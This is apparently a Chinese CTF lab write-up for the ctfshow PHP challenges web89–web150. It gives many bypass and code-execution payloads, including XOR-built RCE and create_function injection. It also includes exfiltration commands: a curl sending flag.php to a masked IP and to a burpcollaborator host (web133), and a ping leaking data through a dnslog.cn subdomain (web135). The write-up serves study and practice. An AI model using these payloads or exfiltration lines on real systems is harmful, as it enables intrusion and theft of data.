web89

利用intval的这个特性：

非空的数组会返回1，因此利用数组绕过。

web90

两种方式：

?num=4476a
?num=0x117c

web91

考察了preg_match的/m模式。

默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”，那么开始和结束将会指字符串的每一行：每一行的开头就是"^"，结尾就是"$"。

因此?cmd=php%0a1即可

web92

<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

第一反应是进制绕过：?num=0x117c，确实可以。
看了一下hint，原来除了0x,0,等，还有e这个特殊的东西，也就是科学计数法。

intval()函数如果$base为0则$var中存在字母的话遇到字母就停止读取 但是e这个字母比较特殊，可以在PHP中不是科学计数法。所以为了绕过前面的==4476我们就可以构造 4476e123 其实不需要是e其他的字母也可以

在弱类型比较的时候，4476e123是科学计数法4476*10^123，而在intval函数中，遇到字母就停止读取，因此是4476，成功绕过，非常巧妙。

web93

和之前一样，但是过滤了字母，所以16进制0x不行，但是可以用8八进制：

?num=010574

web94

必须可以找到0但是不能在首位，而且不能有字母，因此进制绕过不行。
我想的是拿特殊字符：

4476,0

确实可以，除了逗号，其他的字符基本都可以。看了一下hint：

在93的基础上过滤了开头为0的数字 这样的话就不能使用进制转换来进行操作 我们可以使用小数点来进行操作。这样通过intval()函数就可以变为int类型的4476 ?num=4476.0

思路基本一样。

web95

利用八进制，但是前面需要加东西。经过测试，加号和空格可以，加号比较好理解，但是空格为什么可以我也很迷。。。

?num= 010574
?num=+010574

web96

还是自己太菜了，一些重要的小trick在关键时刻想不起来。

?u=/var/www/html/flag.php
?u=./flag.php
?u=php://filter/resource=flag.php

利用伪协议来绕过这个姿势在很多环境中都可能有妙用。

web97

md5的老套路了：

a[]=1&b[]=2

web98

一开始我没看懂&是啥意思，但是做出来了，看了一眼WP才突然想起来这是取地址的意思（应该吧，我照着C语言的&理解的）。
这题中间的两行代码没什么用，最终payload如下：

web99

in_array函数的漏洞：

因为没有设置第三个参数，所以默认是弱类型比较，碰运气试数字.php，比如1.php，运气好就可以写进马。

web100

以前还真没怎么注意过 and。。原来还是运算符顺序的问题：

所以我们只要让v1是is_numeric就可以了。
这题的预期解是利用PHP中的反射类ReflectionClass，因为已经提示了flag在ctfshow这个类里，payload如下：

?v1=1&v2=echo new ReflectionClass&v3=;

关于反射类，羽师傅的WP里给出了这个例子，以供学习：

<?php
class A{
public static $flag="flag{123123123}";
const  PI=3.14;
static function hello(){
    echo "hello</br>";
}
}
$a=new ReflectionClass('A');


var_dump($a->getConstants());  获取一组常量
输出
 array(1) {
  ["PI"]=>
  float(3.14)
}

var_dump($a->getName());    获取类名
输出
string(1) "A"

var_dump($a->getStaticProperties()); 获取静态属性
输出
array(1) {
  ["flag"]=>
  string(15) "flag{123123123}"
}

var_dump($a->getMethods()); 获取类中的方法
输出
array(1) {
  [0]=>
  object(ReflectionMethod)#2 (2) {
    ["name"]=>
    string(5) "hello"
    ["class"]=>
    string(1) "A"
  }
}

当然因为这题没有什么过滤，所以命令执行也是可以的：

?v1=1&v2=system("ls")/*&v3=*/;

可以说干啥都行。

web101

修复了上一题的非预期，还是用反射类即可。

web102

我一看到substr($v2,2)就知道肯定考十六进制绕过is_numeric，想着随便绕，然后我发现了php7的环境，一脸懵逼。
想了一下思路，可以用伪协议的base64把一些<? ?> ; () # [] 这些符号变成数字大小写字母啥的，回调函数那里可以用一些进制转换的函数，不过我忘记了hex2bin。。。然后就卡住了。

看了一下WP，思路还是没错了，不过就是忘记了hex2bin这个函数：

如何绕过is_numeric呢？利用e，科学计数法就可以了，不过就需要找构造是纯数字和e的，比较难，放一下大师傅的payload：

$a='<?=`cat *`;';
$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //这里直接用去掉=的base64
输出   5044383959474e6864434171594473

带e的话会被认为是科学计数法，可以通过is_numeric检测。
大家可以尝试下去掉=和带着=的base64解码出来的内容是相同的。因为等号在base64中只是起到填充的作用，不影响具体的数据内容。

web103

同上

web104

v1和v2传相同的值都行吧。。。0限制的题吗。。出错了吧。。。

web105

变量覆盖，利用die输出$error或者$suces，之前把$flag的覆盖给他们。
通过error输出：

通过suces输出：

ba$flag给$feng，然后让$_POST[‘flag’]和$flag都为null，$suces=$feng即可。

web106

没啥好说的，都是弱类型比较，去数组绕过,0e绕过或者sha1碰撞。

web107

parse_str将字符串解析成多个变量。

web108

利用ereg函数的漏洞：00截断。%00截断及遇到%00则默认为字符串的结束
所以构造如下：

?c=a%00778

web109

因为只要有字母就行，所以利用PHP已有的类闭合一下，然后构造命令执行即可。

?v1=Exception();system("ls");//&v2=a
?v1=ReflectionClass&v2=system("ls")
?v1=ReflectionClass("PDO");system("ls");//&v2=a

中间那个，可以不闭合的原理就是因为先执行的system，然后才报的错。你可以理解成phpinfo(system("ls"));，先执行的system。

web110

又是姿势盲区，考察的是FilesystemIterator类的使用，简单的使用参考羽师傅的图片：

获取当前的目录则可以用getcwd函数，所以payload如下：

?v1=FilesystemIterator&v2=getcwd

缺陷是如果flag的文件不在第一位的话，就不能得到这个文件名。而且这个也没法读文件，所以这题的flag文件和之前一样都是.txt。

web111

学完就忘。。利用PHP的超全局变量$GLOBALS

?v1=ctfshow&v2=GLOBALS

web112

绕过is_file，然后highlight_file，很明显用伪协议。

php://filter/resource=flag.php

hint中还有这些
php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php
php://filter/read=convert.quoted-printable-encode/resource=flag.php
compress.zlib://flag.php

web113

还是姿势盲区，payload如下：

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php 

这个姿势应该是PHP的一个比较新的特性，在WMCTF2020里出了一题来考它：

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

这里使用的是PHP最新版的小Trick，require_once包含的软链接层数较多事 once 的 hash 匹配会直接失效造成重复包含

而/proc/self/root指向的就是根目录/，具体这种姿势的底层的原理就不得而知了，还是能力不够，没法深入到那种程度，现在自己会用就行。至于为什么这个姿势也可以用来绕过is_file的检验，可能底层原理是类似的吧。

web114

没过滤php://filter。。。。

web115

不太会，看了一下羽师傅的WP，写个PHPfuzz出来。

<?php

for($i=0;$i<=128;$i++){
    $str=chr($i)."1";
    if(is_numeric($str)){
        echo urlencode(chr($i))."<br>";
    }
}

<?php

for($i=0;$i<=128;$i++){
    $str=chr($i)."1";
    if(is_numeric($str)&& trim($str)!=='1'){
        echo urlencode(chr($i))."<br>";
    }
}

只有%0c符合条件：

?num=%0c36

其实这也是一种思路，对于绕过，如果不知道怎么绕过就拿ASCII码把所有字符跑一遍。

web123

比较难的地方就是$_POST['CTF_SHOW.COM']的构造，想构造出.，需要前面带上[，后面用.就可以不变成_。当然也可以用脚本跑出来。
最终payload如下：

CTF_SHOW=1&CTF[SHOW.COM=1&fun=extract($_POST)&fl0g=flag_give_me
CTF_SHOW=1&CTF[SHOW.COM=1&fun=echo $flag

web125

才注意到那个$_SERVER['argv']：

参考一下羽师傅博客：

1、cli模式（命令行）下

	第一个参数$_SERVER['argv'][0]是脚本名，其余的是传递给脚本的参数

2、web网页模式下

	在web页模式下必须在php.ini开启register_argc_argv配置项
	
    设置register_argc_argv = On(默认是Off)，重启服务，$_SERVER[‘argv’]才会有效果

    这时候的$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]

    $argv,$argc在web模式下不适用

可以在本地开启register_argc_argv后测试一下：

<?php
var_dump($_SERVER['argv']);

因此可以把代码写到get的查询语句中，然后eval($a[0])执行即可。

看了一下羽师傅的博客，本题的预期解是这样：

get: a=1+fl0g=flag_give_me
post: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

可以用加号+进行分隔，从而使得$_SERVER['argv']这个array不仅仅只有[0]。

web126

同上

web127

对_url编码一次即可，$_SERVER['QUERY_STRING'];获取的查询语句是服务端还没url解码的，所以url编码绕过即可：

?ctf%5fshow=ilove36d

web128

又是姿势盲区，是gettext拓展的使用：

<?php
echo gettext("phpinfo");
结果  phpinfo

echo _("phpinfo");
结果 phpinfo

在开启该拓展后 _() 等效于 gettext()
所以有了gettext，直接构造即可：

?f1=_&f2=get_defined_vars

web129

构造的f中需要有ctfshow，但是又不影响读flag.php，姿势还是挺多的：

?f=php://filter/ctfshow|/resource=flag.php
?f=./ctfshow/../flag.php

web130

看到这个正则匹配：if(preg_match('/.+?ctfshow/is', $f)){，比较容易想到回溯，因为让我绕我也想不出来怎么去绕过。。。不过回溯肯定可以。

学习一下P神的博客：PHP利用PCRE回溯次数限制绕过某些安全限制

import requests

url='http://f94875cc-6b28-46e2-a59c-4ad652d03be2.chall.ctf.show/'
data={
    'f':'a'*1000000+'ctfshow'
}
r=requests.post(url=url,data=data).text
print(r)

看了一下羽师傅的WP，原来还能数组绕过。。。是个非预期：

f[]=1

stripos应用于数组的时候会返回null，null!==false，所以非预期了。

又看了一眼hint，我又震惊了：f=ctfshow。发生甚么事了？
又查了一下，原来对这正则表达式的理解还是不太对：/.+?ctfshow/is
在/s模式下，.匹配任意字符，+表示重复一次或更多次，没错是至少一次！而后面加个?表示懒惰模式，+?表示重复1次或更多次，但尽可能少重复。当然懒惰模式并不影响解题思路，总之就是ctfshow前面必须得有字符才能匹配到，所以直接f=ctfshow就可以了。。

web131

回溯。见上。

web132

在/admin/index.php
因为||的优先级低于&&所以可以这样理解：

if(($code === mt_rand(1,0x36D) && $password === $flag )||( $username ==="admin")){

所以满足username==="admin"就可以了。

web133

error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}

一个比较有意思的姿势，因为eval前6个字母，所以基本上不可能执行出什么命令，所以这样：

?F=`$F` ;ls;

取前6个字母正好是`$F` ;因此相当于执行：

eval(`$F` ;);
``$F` ;ls;`

因此后面的命令可以随意构造。不过比较麻烦的就是反引号是没有回显的，需要弹shell或者用curl。这题bash弹shell失败了，所以只能curl。
我curl的方式是这样：

?F=`$F` ;curl http://118.***.***.***/`tail -n 1 flag.php|base64`;

因为flag.php内容太多，直接get的话显示不全，而且会在传输过程中丢失一些字符，所以只读最后一行，然后base64加密。

看了一下羽师傅的WP，学习到了一种用burp suite进行curl回显的方式：

payload: curl -X POST -F xx=@flag.php http://xxx

?F=`$F` ;curl -X post -F xx=@flag.php http://o1qcs5wj2bwp1c2phocymh1k1b71vq.burpcollaborator.net;

得到flag:

看来burp suite其实还有许许多多的有用的功能呢。

web134

@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);

既然是extract的$_POST，就利用parse_str把$_POST给覆盖掉,payload：

?_POST[key1]=36d&_POST[key2]=36d

web135

其实跟没过滤没啥区别，既然不弹shell也不curl，直接在文件系统里写就完了。
这里提供2个简单的思路，当然其他的思路肯定也可以：

?F=`$F` ;cp flag.php 2.txt;
?F=`$F` ;uniq flag.php>4.txt;

又看了一下羽师傅的WP，又学到新东西了，就是通过ping来得到命令执行的结果，应对命令执行无回显又有一种新姿势了。不过好像在135题这个环境不行，在133题的环境里可以，我复现一下。

利用ping的原理就是DNS请求：

如果请求的目标不是ip地址而是域名，那么域名最终还要转化成ip地址，就肯定要做一次域名解析请求。那么假设我有个可控的二级域名，那么它发出三级域名解析的时候，我这边是能够拿到它的域名解析请求的，这就相当于可以配合DNS请求进行命令执行的判断，这一般就被称为dnslog。（要通过dns请求即可通过ping命令，也能通过curl命令，只要对域名进行访问，让域名服务器进行域名解析就可实现）

利用工具：DNSLOG：

?F=`$F` ;ping `awk '/flag/' flag.php`.oywkie.dnslog.cn

web136

又从羽师傅的题那里学习到了新东西了，这题主要问题就是ban了.和<>，因为ban了.，所以很难反弹shell，那些命令的ban并没有什么用，用’’,"",``都可以绕过。
又学习到了把命令执行的内容写入文件的一种新姿势：

ls /|tee 1

就可以把ls /执行的结果写入1这个文件中，剩下的就是正常的命令执行了。

web137

call_user_func这个回调函数的简单使用，确实没难度：

ctfshow=ctfshow::getFlag

web138

相当于过滤了:，没法::这样使用静态方法了，看了一下WP，又学习到了新的东西，其实还是对PHP文档不熟，这是PHP文档下面的例子：

call_user_func函数里面可以传数组，第一个元素是类名或者类的一个对象，第二个元素是类的方法名，同样可以调用。

ctfshow[0]=ctfshow&ctfshow[1]=getFlag

web139

盲打。。。暂时放一下。。

web140

太开放了，只要让intval($code)是0就可以，实际上乱弄一些函数都可以，最后得到的结果是null同样符合条件，所以这题过于开放了：

f1=getallheaders&f2=end

等等等。。。。

web141

又学习到新东西了。

highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];

    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/^\W+$/', $v3)){
            $code =  eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}

自己还是太菜了。首先是那个正则表达式，\W是反义，匹配任意不是字母，数字，下划线，汉字的字符。这里可以无数字字母rce，但是我没想到。。。太菜了。。。
既然v3可以无数字字母rce，正常是直接构造就可以的，但是这题有个return。php官方文档写着：

return会中止当前字符串的执行。什么意思呢，看这两个例子：

eval("phpinfo();return 1;");
eval("return 1;phpinfo();")

第一句会执行phpinfo()，但是第二句不行，因为return后就中止了。
但是这样可以：eval("return phpinfo();")
因此v3肯定是命令执行，但是v1v2又怎么弄呢？PHP里面数字是可以和一些命令进行运算，例如1-phpinfo()-1，这样仍然可以执行phpinfo()，因此构造就很明显了。中单的v3用无数字字母rce就可以：

?v1=1&v2=1&v3=-(%80%80%80%80%80%80^%F3%F9%F3%F4%E5%ED)(%80%80%80%80%80^%E3%E1%F4%A0%AA)-

web142

v1=0。。。确实没难度。

web143

没ban异或，那就用异或

?v1=1&v2=1&v3=^(%80%80%80%80%80%80^%F3%F9%F3%F4%E5%ED)(%80%80%80%80%80^%E3%E1%F4%A0%AA)^

web144

随便构造就行：

?v1=1&v2=-(%80%80%80%80%80%80^%F3%F9%F3%F4%E5%ED)(%80%80%80%80%80^%E3%E1%F4%A0%AA)&v3=1

web145

取反和或都没ban：

?v1=1&v2=1&v3=|(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D5)|

不过这题的考点其实是三目运算符。。。

?v1=1&v2=1&v3=?(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D5):

因为ban的少了，所以会有非预期，不过其实都差不多。

web146

同上

?v1=1&v2=1&v3=|(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D5)|

web147

是P神代码审计小密圈2周年的一道题目，考点也比较明显，是create_function的代码注入，参考如下：解析create_function() && 复现
原理就是}闭合原来的函数，然后执行命令，然后再把多余的}给注释掉就可以了。但是这题相对难办的是这个正则：

if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {

正常的思路肯定就是在create_function的最前面或者尾部fuzz所有的ASCII字母，可以发现\是可以成功的。
那么为什么呢？这涉及到了php命令空间，就类似linux的路径一样，flag.txt就是在当前目录下，/flag.txt是根目录下的。而在php中，可以自己定义命名空间，但是最根本，最大的命名空间就是\，正常我们调用create_function函数，其实是调用的\这个命名空间下的函数，即\create_function，带上\相当于linux中的绝对路径的写法。因此最终payload如下：

?show=}system("cat flag.php");/*
ctf=\create_function

web148

没过滤异或，直接异或构造就完事了。

?code=(%80%80%80%80%80%80%80%80%80%80%80%80%80%80%80%80^%E7%E5%F4%DF%E3%F4%E6%F3%E8%EF%F7%DF%E6%EC%B0%E7)();

web149

比较明显的条件竞争，但是条件竞争到的概率太低了，可能和网速和服务器有关系，我这跑了几分钟都没竞争到，想了想不如直接往index.php写马，就可以了。

web150

没啥好说的，2个非预期一个是包含日志文件，另一个是包含session文件，可以自己尝试，这题主要是预期解，利用phpinfo。
参考文章：
PHP文件包含漏洞（利用phpinfo）

不过改预期解的那个exp老是改不好。。。暂时咕咕咕了这题。